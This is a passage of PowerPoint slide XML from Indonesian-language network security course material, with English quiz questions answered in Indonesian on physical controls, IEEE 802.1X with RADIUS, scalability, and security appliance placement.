              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peluang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. A company wants to upgrade switches to enforce device authentication. Which framework, standard, or protocol must the switch models support?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>IEEE 802.1X (Port-based Network Access Control).</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dirty="0"/>
              <a:t>802.1X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> authenticator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (supplicant) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> via RADIUS server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Network Access Control (NAC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>5. Two companies are merging and want to consolidate employees at a single site. Neither company’s on-premises networks have space to add the 100 desktops required. Which consideration factor does the current architecture model fail to address?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Scalability (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tumbuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>).</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dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 100 user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> scalability: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, switch port availability, IP addressing, power &amp; cooling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> scalability, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> merger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21773951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Peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atributnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penempatannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Topik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendesain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
